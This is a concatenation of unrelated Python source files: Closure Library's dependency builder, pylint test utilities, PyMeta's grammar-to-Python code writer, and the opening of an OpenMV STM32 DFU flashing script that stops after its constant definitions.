    return '\n'.join(rendered) + '\n\n'
def write_rst_dict(info, prefix=''):
    """Render *info* as a key-sorted rST bullet list."""
    bullets = [prefix + '* ' + key + ' : ' + str(value)
               for key, value in sorted(info.items())]
    return '\n'.join(bullets) + '\n\n'
| |
#!/usr/bin/env python
#
# Copyright 2009 The Closure Library Authors. All Rights Reserved.
"""Utility for Closure Library dependency calculation.
ClosureBuilder scans source files to build dependency info. From the
dependencies, the script can produce a deps.js file, a manifest in dependency
order, a concatenated script, or compiled output from the Closure Compiler.
Paths to files can be expressed as individual arguments to the tool (intended
for use with find and xargs). As a convenience, --root can be used to specify
all JS files below a directory.
usage: %prog [options] [file1.js file2.js ...]
"""
import logging
import optparse
import os
import sys
import depstree
import jscompiler
import source
import treescan
def _GetOptionsParser():
    """Get the options parser."""

    # __doc__ of this module becomes the usage text.
    parser = optparse.OptionParser(__doc__)
    # -i/--input and -n/--namespace are combined into one namespace set.
    parser.add_option('-i',
                      '--input',
                      dest='inputs',
                      action='append',
                      default=[],
                      help='One or more input files to calculate dependencies '
                      'for.  The namespaces in this file will be combined with '
                      'those given with the -n flag to form the set of '
                      'namespaces to find dependencies for.')
    parser.add_option('-n',
                      '--namespace',
                      dest='namespaces',
                      action='append',
                      default=[],
                      help='One or more namespaces to calculate dependencies '
                      'for.  These namespaces will be combined with those given '
                      'with the -i flag to form the set of namespaces to find '
                      'dependencies for.  A Closure namespace is a '
                      'dot-delimited path expression declared with a call to '
                      'goog.provide() (e.g. "goog.array" or "foo.bar").')
    # NOTE(review): --root has no default, so options.roots is None when the
    # flag is never passed — callers must guard before iterating.
    parser.add_option('--root',
                      dest='roots',
                      action='append',
                      help='The paths that should be traversed to build the '
                      'dependencies.')
    parser.add_option('-o',
                      '--output_mode',
                      dest='output_mode',
                      type='choice',
                      action='store',
                      choices=['list', 'script', 'compiled'],
                      default='list',
                      help='The type of output to generate from this script. '
                      'Options are "list" for a list of filenames, "script" '
                      'for a single script containing the contents of all the '
                      'files, or "compiled" to produce compiled output with '
                      'the Closure Compiler.  Default is "list".')
    parser.add_option('-c',
                      '--compiler_jar',
                      dest='compiler_jar',
                      action='store',
                      help='The location of the Closure compiler .jar file.')
    parser.add_option('-f',
                      '--compiler_flags',
                      dest='compiler_flags',
                      default=[],
                      action='append',
                      help='Additional flags to pass to the Closure compiler.')
    parser.add_option('--output_file',
                      dest='output_file',
                      action='store',
                      help=('If specified, write output to this path instead of '
                            'writing to standard output.'))

    return parser
def _GetInputByPath(path, sources):
"""Get the source identified by a path.
Args:
path: str, A path to a file that identifies a source.
sources: An iterable collection of source objects.
Returns:
The source from sources identified by path, if found. Converts to
absolute paths for comparison.
"""
for js_source in sources:
# Convert both to absolute paths for comparison.
if os.path.abspath(path) == os.path.abspath(js_source.GetPath()):
return js_source
def _GetClosureBaseFile(sources):
    """Given a set of sources, returns the one base.js file.

    Note that if zero or two or more base.js files are found, an error message
    will be written and the program will be exited.

    Args:
      sources: An iterable of _PathSource objects.

    Returns:
      The _PathSource representing the base Closure file.
    """
    # list() so len() and indexing work on Python 3, where filter() returns
    # a lazy iterator instead of a list.
    filtered_base_files = list(filter(_IsClosureBaseFile, sources))
    if not filtered_base_files:
        logging.error('No Closure base.js file found.')
        sys.exit(1)
    if len(filtered_base_files) > 1:
        logging.error('More than one Closure base.js files found at these paths:')
        for base_file in filtered_base_files:
            logging.error(base_file.GetPath())
        sys.exit(1)
    return filtered_base_files[0]
def _IsClosureBaseFile(js_source):
"""Returns true if the given _PathSource is the Closure base.js source."""
if os.path.basename(js_source.GetPath()) == 'base.js':
# Sanity check that this is the Closure base file. Check that this
# is where goog is defined.
for line in js_source.GetSource().splitlines():
if line.startswith('var goog = goog || {};'):
return True
return False
class _PathSource(source.Source):
    """Source file subclass that remembers its file path."""

    def __init__(self, path):
        """Initialize a source.

        Args:
          path: str, Path to a JavaScript file.  The source string will be read
            from this file.
        """
        # Parent holds the file contents; the path is kept alongside so the
        # builder can report and compare file locations later.
        super(_PathSource, self).__init__(source.GetFileContents(path))

        self._path = path

    def GetPath(self):
        """Returns the path."""
        return self._path
def main():
    """Entry point: scan sources, resolve dependencies, emit requested output."""
    logging.basicConfig(format=(sys.argv[0] + ': %(message)s'),
                        level=logging.INFO)
    options, args = _GetOptionsParser().parse_args()

    # Make our output pipe.
    if options.output_file:
        out = open(options.output_file, 'w')
    else:
        out = sys.stdout

    sources = set()

    logging.info('Scanning paths...')
    # --root has no default, so guard against options.roots being None.
    for path in options.roots or []:
        for js_path in treescan.ScanTreeForJsFiles(path):
            sources.add(_PathSource(js_path))

    # Add scripts specified on the command line.
    # BUG FIX: these were previously wrapped as source.Source(_PathSource(...)),
    # producing objects without a usable GetPath() — which broke
    # _GetInputByPath and base.js detection for files given as arguments.
    for path in args:
        sources.add(_PathSource(path))

    logging.info('%s sources scanned.', len(sources))

    # Though deps output doesn't need to query the tree, we still build it
    # to validate dependencies.
    logging.info('Building dependency tree..')
    tree = depstree.DepsTree(sources)

    input_namespaces = set()
    inputs = options.inputs or []
    for input_path in inputs:
        js_input = _GetInputByPath(input_path, sources)
        if not js_input:
            logging.error('No source matched input %s', input_path)
            sys.exit(1)
        input_namespaces.update(js_input.provides)

    input_namespaces.update(options.namespaces)

    if not input_namespaces:
        logging.error('No namespaces found. At least one namespace must be '
                      'specified with the --namespace or --input flags.')
        sys.exit(2)

    # The Closure Library base file must go first.
    base = _GetClosureBaseFile(sources)
    deps = [base] + tree.GetDependencies(input_namespaces)

    output_mode = options.output_mode
    if output_mode == 'list':
        out.writelines([js_source.GetPath() + '\n' for js_source in deps])
    elif output_mode == 'script':
        out.writelines([js_source.GetSource() for js_source in deps])
    elif output_mode == 'compiled':
        # Make sure a .jar is specified.
        if not options.compiler_jar:
            logging.error('--compiler_jar flag must be specified if --output is '
                          '"compiled"')
            sys.exit(2)
        compiled_source = jscompiler.Compile(
            options.compiler_jar,
            [js_source.GetPath() for js_source in deps],
            options.compiler_flags)
        if compiled_source is None:
            logging.error('JavaScript compilation failed.')
            sys.exit(1)
        else:
            logging.info('JavaScript compilation succeeded.')
            out.write(compiled_source)
    else:
        logging.error('Invalid value for --output flag.')
        sys.exit(2)
# Standard script entry point.
if __name__ == '__main__':
    main()
| |
# Copyright (c) 2003-2013 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""functional/non regression tests for pylint"""
from __future__ import print_function
import collections
import contextlib
import functools
import os
import sys
import re
import unittest
import tempfile
import tokenize
from glob import glob
from os import linesep, getcwd, sep
from os.path import abspath, basename, dirname, isdir, join, splitext
from astroid import test_utils
from pylint import checkers
from pylint.utils import PyLintASTWalker
from pylint.reporters import BaseReporter
from pylint.interfaces import IReporter
from pylint.lint import PyLinter
import six
from six.moves import StringIO
# Utils

# '%d%d%d' of sys.version_info (e.g. '275'); compared as a *string* against
# version suffixes parsed from test filenames in get_tests_info().
SYS_VERS_STR = '%d%d%d' % sys.version_info[:3]
TITLE_UNDERLINES = ['', '=', '-', '.']
# Directory containing this test support module and its input files.
PREFIX = abspath(dirname(__file__))
PY3K = sys.version_info[0] == 3
def fix_path():
    """Prepend the test directory (PREFIX) to sys.path so inputs import."""
    sys.path.insert(0, PREFIX)
def get_tests_info(input_dir, msg_dir, prefix, suffix):
    """get python input examples and output messages

    We use following conventions for input files and messages:
    for different inputs:
        test for python  >= x.y    ->  input   =  <name>_pyxy.py
        test for python  <  x.y    ->  input   =  <name>_py_xy.py
    for one input and different messages:
        message for python >=  x.y ->  message =  <name>_pyxy.txt
        lower versions             ->  message with highest num
    """
    result = []
    for fname in glob(join(input_dir, prefix + '*' + suffix)):
        infile = basename(fname)
        fbase = splitext(infile)[0]
        # filter input files :
        pyrestr = fbase.rsplit('_py', 1)[-1]  # like _26 or 26
        if pyrestr.isdigit():  # '24', '25'...
            # NOTE: versions are compared as strings, which only works while
            # both sides have the same number of digits (e.g. '27' vs '26').
            if SYS_VERS_STR < pyrestr:
                continue
        if pyrestr.startswith('_') and pyrestr[1:].isdigit():
            # skip test for higher python versions
            if SYS_VERS_STR >= pyrestr[1:]:
                continue
        messages = glob(join(msg_dir, fbase + '*.txt'))
        # the last one will be without ext, i.e. for all or upper versions:
        if messages:
            # Pick the highest versioned message file that our interpreter
            # satisfies; the loop leaves `outfile` bound to the chosen one.
            for outfile in sorted(messages, reverse=True):
                py_rest = outfile.rsplit('_py', 1)[-1][:-4]
                if py_rest.isdigit() and SYS_VERS_STR >= py_rest:
                    break
        else:
            # This will provide an error message indicating the missing filename.
            outfile = join(msg_dir, fbase + '.txt')
        result.append((infile, outfile))
    return result
class TestReporter(BaseReporter):
    """reporter storing plain text messages"""

    __implements__ = IReporter

    def __init__(self):  # pylint: disable=super-init-not-called
        self.message_ids = {}
        self.reset()
        self.path_strip_prefix = getcwd() + sep

    def reset(self):
        """Start a fresh output buffer and message list."""
        self.out = StringIO()
        self.messages = []

    def add_message(self, msg_id, location, msg):
        """manage message of different type and in the context of path """
        _, _, obj, line, _ = location
        self.message_ids[msg_id] = 1
        if obj:
            obj = ':%s' % obj
        sigle = msg_id[0]
        if PY3K and linesep != '\n':
            # 2to3 writes os.linesep instead of using
            # the previosly used line separators
            msg = msg.replace('\r\n', '\n')
        formatted = '%s:%3s%s: %s' % (sigle, line, obj, msg)
        self.messages.append(formatted)

    def finalize(self):
        """Return the sorted messages as one string and reset state."""
        for msg in sorted(self.messages):
            print(msg, file=self.out)
        result = self.out.getvalue()
        self.reset()
        return result

    def display_results(self, layout):
        """ignore layouts"""
class Message(collections.namedtuple('Message',
                                     ['msg_id', 'line', 'node', 'args'])):
    """Expected-message record; every field but msg_id defaults to None."""
    def __new__(cls, msg_id, line=None, node=None, args=None):
        # Bypass the namedtuple constructor so the defaults apply.
        return tuple.__new__(cls, (msg_id, line, node, args))
class UnittestLinter(object):
    """A fake linter class to capture checker messages."""
    # pylint: disable=unused-argument, no-self-use

    def __init__(self):
        self._messages = []
        self.stats = {}

    def release_messages(self):
        """Hand back every captured message and reset the buffer."""
        captured = self._messages
        self._messages = []
        return captured

    def add_message(self, msg_id, line=None, node=None, args=None,
                    confidence=None):
        """Record the message instead of reporting it."""
        self._messages.append(Message(msg_id, line, node, args))

    def is_message_enabled(self, *unused_args):
        """Every message is considered enabled under test."""
        return True

    def add_stats(self, **kwargs):
        """Merge keyword stats into the running stats dict."""
        self.stats.update(kwargs)
        return self.stats

    @property
    def options_providers(self):
        # Delegate to the module-level linter fixture.
        return linter.options_providers
def set_config(**kwargs):
    """Decorator for setting config values on a checker."""
    def _decorator(fun):
        @functools.wraps(fun)
        def _wrapped(self):
            for option, value in kwargs.items():
                setattr(self.checker.config, option, value)
            if isinstance(self, CheckerTestCase):
                # reopen checker in case, it may be interested in configuration change
                self.checker.open()
            fun(self)
        return _wrapped
    return _decorator
class CheckerTestCase(unittest.TestCase):
    """A base testcase class for unittesting individual checker classes."""
    # Subclasses set the checker under test and optional config overrides.
    CHECKER_CLASS = None
    CONFIG = {}

    def setUp(self):
        # Fresh fake linter + checker per test; CONFIG entries override the
        # checker's option defaults before it is opened.
        self.linter = UnittestLinter()
        self.checker = self.CHECKER_CLASS(self.linter) # pylint: disable=not-callable
        for key, value in six.iteritems(self.CONFIG):
            setattr(self.checker.config, key, value)
        self.checker.open()

    @contextlib.contextmanager
    def assertNoMessages(self):
        """Assert that no messages are added by the given method."""
        with self.assertAddsMessages():
            yield

    @contextlib.contextmanager
    def assertAddsMessages(self, *messages):
        """Assert that exactly the given method adds the given messages.

        The list of messages must exactly match *all* the messages added by the
        method. Additionally, we check to see whether the args in each message can
        actually be substituted into the message string.
        """
        # The comparison must run *after* the with-body, hence the bare yield.
        yield
        got = self.linter.release_messages()
        msg = ('Expected messages did not match actual.\n'
               'Expected:\n%s\nGot:\n%s' % ('\n'.join(repr(m) for m in messages),
                                            '\n'.join(repr(m) for m in got)))
        self.assertEqual(list(messages), got, msg)

    def walk(self, node):
        """recursive walk on the given node"""
        walker = PyLintASTWalker(linter)
        walker.add_checker(self.checker)
        walker.walk(node)
# Init
#
# Shared module-level linter fixture used by the test classes below; state
# persists across tests, so checks must leave it clean.
test_reporter = TestReporter()
linter = PyLinter()
linter.set_reporter(test_reporter)
linter.config.persistent = 0
checkers.initialize(linter)
linter.global_set_option('required-attributes', ('__revision__',))
# Normalize platform line endings to '\n' so expected/actual comparisons
# are stable across operating systems.
if linesep != '\n':
    LINE_RGX = re.compile(linesep)
    def ulines(string):
        return LINE_RGX.sub('\n', string)
else:
    def ulines(string):
        return string

# Input modules named func_iNNNN exercise informational (I) messages.
INFO_TEST_RGX = re.compile(r'^func_i\d\d\d\d$')
def exception_str(self, ex):  # pylint: disable=unused-argument
    """function used to replace default __str__ method of exception instances"""
    joined_args = ', '.join(ex.args)
    return 'in %s\n:: %s' % (ex.file, joined_args)
# Test classes
class LintTestUsingModule(unittest.TestCase):
    """Functional test: lint one input module and compare the produced
    messages with the recorded expected-output file."""
    INPUT_DIR = None
    DEFAULT_PACKAGE = 'input'
    package = DEFAULT_PACKAGE
    linter = linter
    module = None
    depends = None
    output = None
    _TEST_TYPE = 'module'
    maxDiff = None

    def shortDescription(self):
        # Human-readable test title shown by the unittest runner.
        values = {'mode' : self._TEST_TYPE,
                  'input': self.module,
                  'pkg': self.package,
                  'cls': self.__class__.__name__}

        if self.package == self.DEFAULT_PACKAGE:
            msg = '%(mode)s test of input file "%(input)s" (%(cls)s)'
        else:
            msg = '%(mode)s test of input file "%(input)s" in "%(pkg)s" (%(cls)s)'
        return msg % values

    def test_functionality(self):
        # Check the module itself plus any declared dependencies.
        tocheck = [self.package+'.'+self.module]
        if self.depends:
            tocheck += [self.package+'.%s' % name.replace('.py', '')
                        for name, _ in self.depends]
        self._test(tocheck)

    def _check_result(self, got):
        self.assertMultiLineEqual(self._get_expected().strip()+'\n',
                                  got.strip()+'\n')

    def _test(self, tocheck):
        # Informational messages are only enabled for func_iNNNN inputs.
        if INFO_TEST_RGX.match(self.module):
            self.linter.enable('I')
        else:
            self.linter.disable('I')
        try:
            self.linter.check(tocheck)
        except Exception as ex:
            # need finalization to restore a correct state
            self.linter.reporter.finalize()
            # Attach context so the failure names the offending input.
            ex.file = tocheck
            print(ex)
            ex.__str__ = exception_str
            raise
        self._check_result(self.linter.reporter.finalize())

    def _has_output(self):
        # func_noerror_* inputs are expected to produce no messages at all.
        return not self.module.startswith('func_noerror_')

    def _get_expected(self):
        if self._has_output() and self.output:
            with open(self.output, 'U') as fobj:
                return fobj.read().strip() + '\n'
        else:
            return ''
class LintTestUsingFile(LintTestUsingModule):
    """Variant that feeds file paths (not module names) to the linter."""

    _TEST_TYPE = 'file'

    def test_functionality(self):
        importable = join(self.INPUT_DIR, self.module)
        # python also prefers packages over simple modules.
        if not isdir(importable):
            importable += '.py'
        tocheck = [importable]
        if self.depends:
            tocheck.extend(join(self.INPUT_DIR, name)
                           for name, _file in self.depends)
        self._test(tocheck)
class LintTestUpdate(LintTestUsingModule):
    """Variant that rewrites the expected-output file instead of asserting."""

    _TEST_TYPE = 'update'

    def _check_result(self, got):
        if not self._has_output():
            return
        try:
            expected = self._get_expected()
        except IOError:
            expected = ''
        if got != expected:
            with open(self.output, 'w') as fobj:
                fobj.write(got)
# Callback
def cb_test_gen(base_class):
def call(input_dir, msg_dir, module_file, messages_file, dependencies):
# pylint: disable=no-init
class LintTC(base_class):
module = module_file.replace('.py', '')
output = messages_file
depends = dependencies or None
INPUT_DIR = input_dir
MSG_DIR = msg_dir
return LintTC
return call
# Main function
def make_tests(input_dir, msg_dir, filter_rgx, callbacks):
"""generate tests classes from test info
return the list of generated test classes
"""
if filter_rgx:
is_to_run = re.compile(filter_rgx).search
else:
is_to_run = lambda x: 1
tests = []
for module_file, messages_file in (
get_tests_info(input_dir, msg_dir, 'func_', '')
):
if not is_to_run(module_file) or module_file.endswith('.pyc'):
continue
base = module_file.replace('func_', '').replace('.py', '')
dependencies = get_tests_info(input_dir, msg_dir, base, '.py')
for callback in callbacks:
test = callback(input_dir, msg_dir, module_file, messages_file,
dependencies)
if test:
tests.append(test)
return tests
def tokenize_str(code):
    """Tokenize *code* and return its tokens as a list."""
    readline = StringIO(code).readline
    return list(tokenize.generate_tokens(readline))
@contextlib.contextmanager
def create_tempfile(content=None):
    """Create a new temporary file.

    If *content* parameter is given, then it will be written
    in the temporary file, before passing it back.
    This is a context manager and should be used with a *with* statement.
    """
    # Can't use tempfile.NamedTemporaryFile here
    # because on Windows the file must be closed before writing to it,
    # see http://bugs.python.org/issue14243
    fd, tmp = tempfile.mkstemp()
    if content:
        payload = bytes(content, 'ascii') if sys.version_info >= (3, 0) else content
        os.write(fd, payload)
    try:
        yield tmp
    finally:
        os.close(fd)
        os.remove(tmp)
@contextlib.contextmanager
def create_file_backed_module(code):
    """Create an astroid module for the given code, backed by a real file."""
    with create_tempfile() as temp:
        module = test_utils.build_module(code)
        # Point the module at the temp file so checkers that read
        # module.file see a path that actually exists.
        module.file = temp
        yield module
| |
# -*- test-case-name: pymeta.test.test_builder -*-
from types import ModuleType as module
import linecache, sys
class TreeBuilder(object):
    """
    Produce an abstract syntax tree of OMeta operations.

    Every method returns a plain-list node of the form
    ``[Tag, payload...]``; PythonWriter dispatches on the tag.
    """
    def __init__(self, name, grammar=None, *args):
        # Only the grammar name is retained; grammar/args are ignored here.
        self.name = name

    def makeGrammar(self, rules):
        """Root node wrapping all rules under this grammar's name."""
        return ["Grammar", self.name, rules]

    def rule(self, name, expr):
        """A single named rule."""
        return ["Rule", name, expr]

    def apply(self, ruleName, codeName, *exprs):
        """Invocation of another rule, with optional argument expressions."""
        return ["Apply", ruleName, codeName, exprs]

    def exactly(self, expr):
        """Match one input item exactly equal to expr."""
        return ["Exactly", expr]

    def match_string(self, expr):
        """Match a literal string in the input."""
        return ["MatchString", expr]

    def many(self, expr):
        """Zero-or-more repetition."""
        return ["Many", expr]

    def many1(self, expr):
        """One-or-more repetition."""
        return ["Many1", expr]

    def optional(self, expr):
        """Zero-or-one occurrence."""
        return ["Optional", expr]

    def _or(self, exprs):
        """Ordered-choice alternation."""
        return ["Or"] + exprs

    def _not(self, expr):
        """Negative lookahead."""
        return ["Not", expr]

    def _xor(self, exprs):
        """Exclusive alternation."""
        return ["Xor"] + exprs

    def lookahead(self, expr):
        """Positive lookahead (match without consuming)."""
        return ["Lookahead", expr]

    def sequence(self, exprs):
        """Sequential composition; value is the last sub-expression's."""
        return ["And"] + exprs

    def bind(self, expr, name):
        """Bind expr's value to name in the rule's locals."""
        return ["Bind", name, expr]

    def pred(self, expr):
        """Semantic predicate: expr must evaluate truthy."""
        return ["Predicate", expr]

    def action(self, expr):
        """Embedded Python action expression."""
        return ["Action", expr]

    def expr(self, expr):
        """Embedded Python value expression."""
        return ["Python", expr]

    def listpattern(self, exprs):
        """Match a sub-list whose contents match exprs."""
        return ["List", exprs]

    def consumedby(self, exprs):
        """Yield the input slice consumed by exprs."""
        return ["ConsumedBy", exprs]

    def index_consumedby(self, exprs):
        """Yield the input index range consumed by exprs."""
        return ["IndexConsumedBy", exprs]

    def range(self, c1, c2):
        """Match any single item between c1 and c2 inclusive."""
        return ["Range", c1, c2]

    def interleave(self, exprs):
        """Match exprs in any interleaved order."""
        return ["Interleave"]+exprs
class PythonWriter(object):
"""
Converts an OMeta syntax tree into Python source.
"""
    def __init__(self, tree):
        # AST (nested lists produced by TreeBuilder) to convert to source.
        self.tree = tree
        # Accumulated lines of generated Python code.
        self.lines = []
        # Monotonic counter backing _gensym()'s unique names.
        self.gensymCounter = 0
def _generate(self, retrn=False):
result = self._generateNode(self.tree)
if retrn:
self.lines.append("return (%s, self.currentError)" % (result,))
elif result:
self.lines.append(result)
return self.lines
def output(self):
return '\n'.join(self._generate())
def _generateNode(self, node):
name = node[0]
args = node[1:]
return getattr(self, "generate_"+name)(*args)
def _gensym(self, name):
"""
Produce a unique name for a variable in generated code.
"""
self.gensymCounter += 1
return "_G_%s_%s" % (name, self.gensymCounter)
def _newThunkFor(self, name, expr):
"""
Define a new function of no arguments.
@param name: The name of the rule generating this thunk.
@param expr: A list of lines of Python code.
"""
subwriter = self.__class__(expr)
flines = subwriter._generate(retrn=True)
fname = self._gensym(name)
self._writeFunction(fname, (), flines)
return fname
def _expr(self, typ, e):
"""
Generate the code needed to execute the expression, and return the
variable name bound to its value.
"""
name = self._gensym(typ)
self.lines.append("%s, lastError = %s" % (name, e))
self.lines.append("self.considerError(lastError)")
return name
def _writeFunction(self, fname, arglist, flines):
"""
Generate a function.
@param head: The initial line defining the function.
@param body: A list of lines for the function body.
"""
self.lines.append("def %s(%s):" % (fname, ", ".join(arglist)))
for line in flines:
self.lines.append((" " * 4) + line)
return fname
def compilePythonExpr(self, expr):
"""
Generate code for running embedded Python expressions.
"""
return self._expr('python', 'eval(%r, self.globals, _locals), None' %(expr,))
def generate_Apply(self, ruleName, codeName, rawArgs):
"""
Create a call to self.apply(ruleName, *args).
"""
args = [self._generateNode(x) for x in rawArgs]
if ruleName == 'super':
return self._expr('apply', 'self.superApply("%s", %s)' % (codeName,
', '.join(args)))
return self._expr('apply', 'self._apply(self.rule_%s, "%s", [%s])' % (ruleName,
ruleName,
', '.join(args)))
def generate_Exactly(self, literal):
"""
Create a call to self.exactly(literal).
"""
return self._expr('exactly', 'self.exactly(%r)' % (literal,))
def generate_MatchString(self, literal):
"""
Create a call to self.match_string(literal).
"""
return self._expr('match_string', 'self.match_string(%r)' % (literal,))
def generate_Many(self, expr):
"""
Create a call to self.many(lambda: expr).
"""
fname = self._newThunkFor("many", expr)
return self._expr('many', 'self.many(%s)' % (fname,))
def generate_Many1(self, expr):
"""
Create a call to self.many(lambda: expr).
"""
fname = self._newThunkFor("many1", expr)
return self._expr('many1', 'self.many(%s, %s())' % (fname, fname))
def generate_Optional(self, expr):
"""
Try to parse an expr and continue if it fails.
"""
realf = self._newThunkFor("optional", expr)
passf = self._gensym("optional")
self._writeFunction(passf, (), ["return (None, self.input.nullError())"])
return self._expr('or', 'self._or([%s])' % (', '.join([realf, passf])))
def generate_Or(self, *exprs):
"""
Create a call to
self._or([lambda: expr1, lambda: expr2, ... , lambda: exprN]).
"""
if len(exprs) > 1:
fnames = [self._newThunkFor("or", expr) for expr in exprs]
return self._expr('or', 'self._or([%s])' % (', '.join(fnames)))
else:
return self._generateNode(exprs[0])
def generate_Xor(self, *exprs):
    """
    Create a call to
    self._xor([lambda: expr1, lambda: expr2, ... , lambda: exprN]).
    """
    if len(exprs) > 1:
        fnames = [self._newThunkFor("xor", expr) for expr in exprs]
        return self._expr('xor', 'self._xor([%s])' % (', '.join(fnames)))
    else:
        # Single alternative: no dispatch needed, compile it inline.
        return self._generateNode(exprs[0])
def generate_Not(self, expr):
    """
    Create a call to self._not(thunk): negative lookahead -- succeeds only
    when expr fails to match.
    """
    fname = self._newThunkFor("not", expr)
    return self._expr("not", "self._not(%s)" % (fname,))
def generate_Lookahead(self, expr):
    """
    Create a call to self.lookahead(thunk): match expr without consuming
    input.
    """
    fname = self._newThunkFor("lookahead", expr)
    return self._expr("lookahead", "self.lookahead(%s)" %(fname,))
def generate_And(self, *exprs):
    """
    Generate code for each statement in order; the value of the sequence
    is the value of its final expression (None for an empty sequence).
    """
    v = None
    for ex in exprs:
        v = self._generateNode(ex)
    return v
def generate_Bind(self, name, expr):
    """
    Bind the value of 'expr' to a name in the _locals dict.
    """
    v = self._generateNode(expr)
    ref = "_locals['%s']" % (name,)
    # Emit the assignment as a statement, then hand back the lookup
    # expression so later generated code can reference the bound value.
    self.lines.append("%s = %s" %(ref, v))
    return ref
def generate_Predicate(self, expr):
    """
    Generate a call to self.pred(thunk): the match succeeds only when the
    embedded expression evaluates truthy.
    """
    fname = self._newThunkFor("pred", expr)
    return self._expr("pred", "self.pred(%s)" %(fname,))
def generate_Action(self, expr):
    """
    Generate this embedded Python expression on its own line.
    """
    # Identical to generate_Python; kept separate so each AST node name
    # produced by the parser has a matching generator method.
    return self.compilePythonExpr(expr)
def generate_Python(self, expr):
    """
    Generate this embedded Python expression on its own line.
    """
    return self.compilePythonExpr(expr)
def generate_List(self, expr):
    """
    Generate a call to self.listpattern(thunk): match expr against the
    contents of a list in the input stream.
    """
    fname = self._newThunkFor("listpattern", expr)
    return self._expr("listpattern", "self.listpattern(%s)" %(fname,))
def generate_Rule(self, name, expr):
    """
    Generate a rule_<name> method: set up the rule's _locals dict, then
    splice in the compiled rule body.
    """
    rulelines = ["_locals = {'self': self}",
                 "self.locals[%r] = _locals" % (name,)]
    # Compile the rule body with a fresh writer of the same class so its
    # generated lines (including the trailing return) can be reused whole.
    subwriter = self.__class__(expr)
    flines = subwriter._generate(retrn=True)
    rulelines.extend(flines)
    self._writeFunction("rule_" + name, ("self",), rulelines)
def generate_Grammar(self, name, rules):
    """
    Generate the class statement for the grammar and all of its rules.
    """
    self.lines.append("class %s(GrammarBase):" % (name,))
    self.lines.append(" globals = globals()")
    start = len(self.lines)
    for rule in rules:
        self._generateNode(rule)
    self.lines.extend(['', ''])
    # Indent everything generated for the rules one level so it lands
    # inside the class body; blank lines stay blank (`line and ...`).
    self.lines[start:] = [line and (' ' * 4 + line) for line in self.lines[start:]]
    # Trim one of the two trailing blank lines added above.
    del self.lines[-1:]
def generate_ConsumedBy(self, expr):
    """
    Create a call to self.consumed_by(thunk).

    NOTE(review): presumably returns the span of input consumed by expr
    -- confirm against the runtime's consumed_by implementation.
    """
    fname = self._newThunkFor("consumed_by", expr)
    return self._expr("consumed_by", "self.consumed_by(%s)" % (fname,))
def generate_IndexConsumedBy(self, expr):
    """
    Create a call to self.index_consumed_by(thunk).

    NOTE(review): presumably returns the input indices consumed by expr
    -- confirm against the runtime implementation.
    """
    fname = self._newThunkFor("index_consumed_by", expr)
    return self._expr("index_consumed_by", "self.index_consumed_by(%s)" % (fname,))
def generate_Range(self, c1, c2):
    """
    Create a call to self.range(c1, c2)
    """
    return self._expr('range', 'self.range(%r, %r)' % (c1, c2))
def generate_Interleave(self, *exprs):
    """
    Create a call to
    self._interleave([lambda: expr1, lambda: expr2, ... , lambda: exprN]).
    """
    if len(exprs) > 1:
        args = []
        # Each element is a (repeat-spec, expression, bind-name) triple;
        # flatten them into the generated argument list.
        for x, expr, name in exprs:
            args.append(repr(x))
            args.append(self._newThunkFor("interleave", expr))
            args.append(repr(name))
        return self._expr('interleave', 'self._interleave(_locals, %s)' % (', '.join(args)))
    else:
        # NOTE(review): the single-element case hands the raw triple to
        # _generateNode, unlike the multi-element path -- confirm the AST
        # shape this branch actually receives.
        return self._generateNode(exprs[0])
class BootWriter(PythonWriter):
    """
    PythonWriter variant used while bootstrapping: the generated module
    imports BootBase as its GrammarBase instead of the regular base class.
    """
    def generate_Grammar(self, name, rules):
        # Prepend the bootstrap imports, then defer to the normal generator.
        self.lines.append("from pymeta.bootbase import BootBase as GrammarBase")
        self.lines.append("import string")
        super(BootWriter, self).generate_Grammar(name, rules)
def writePython(tree):
    """Compile a grammar AST to Python source text."""
    pw = PythonWriter(tree)
    return pw.output()
def writeBoot(tree):
    """Compile a grammar AST to bootstrap-flavoured Python source text."""
    pw = BootWriter(tree)
    return pw.output()
class GeneratedCodeLoader(object):
    """
    Object for use as a module's __loader__, to display generated
    source.
    """

    def __init__(self, source):
        # Retain the generated source text for later retrieval.
        self.source = source

    def get_source(self, name):
        """PEP 302 hook: return the stored source. `name` is ignored --
        each loader instance serves exactly one module."""
        return self.source
def moduleFromGrammar(tree, className, superclass, globalsDict):
    """
    Compile a grammar AST into a synthetic module and return the generated
    grammar class.

    @param tree: The grammar AST.
    @param className: Name of the grammar class to generate.
    @param superclass: Runtime base class injected as GrammarBase.
    @param globalsDict: Globals made visible to the generated code.
    """
    source = writePython(tree)
    modname = "pymeta_grammar__" + className
    filename = "/pymeta_generated_code/" + modname + ".py"
    # NOTE(review): `module` is not defined in this chunk -- presumably a
    # ModuleType alias imported elsewhere in the file; confirm.
    mod = module(modname)
    mod.__dict__.update(globalsDict)
    mod.__name__ = modname
    mod.__dict__[superclass.__name__] = superclass
    mod.__dict__["GrammarBase"] = superclass
    # Attach a loader so tooling/tracebacks can fetch the generated source.
    mod.__loader__ = GeneratedCodeLoader(source)
    code = compile(source, filename, "exec")
    eval(code, mod.__dict__)
    mod.__dict__[className].globals = globalsDict
    sys.modules[modname] = mod
    # Prime linecache so tracebacks into generated code can show source.
    linecache.getlines(filename, mod.__dict__)
    return mod.__dict__[className]
| |
#!/usr/bin/env python
# This file is part of the OpenMV project.
# Copyright (c) 2013/2014 Ibrahim Abdelkader <i.abdalkader@gmail.com>
# This work is licensed under the MIT license, see the file LICENSE for
# details.
"""This module implements enough functionality to program the STM32F4xx over
DFU, without requiringdfu-util.
See app note AN3156 for a description of the DFU protocol.
See document UM0391 for a dscription of the DFuse file.
"""
from __future__ import print_function
import argparse
import re
import struct
import sys
import usb.core
import usb.util
import zlib
# VID/PID of the STM32 DFU bootloader targeted by this tool
__VID = 0x0483
__PID = 0xdf11
# USB request __TIMEOUT (milliseconds)
__TIMEOUT = 4000
# DFU commands (bRequest values)
__DFU_DETACH = 0
__DFU_DNLOAD = 1
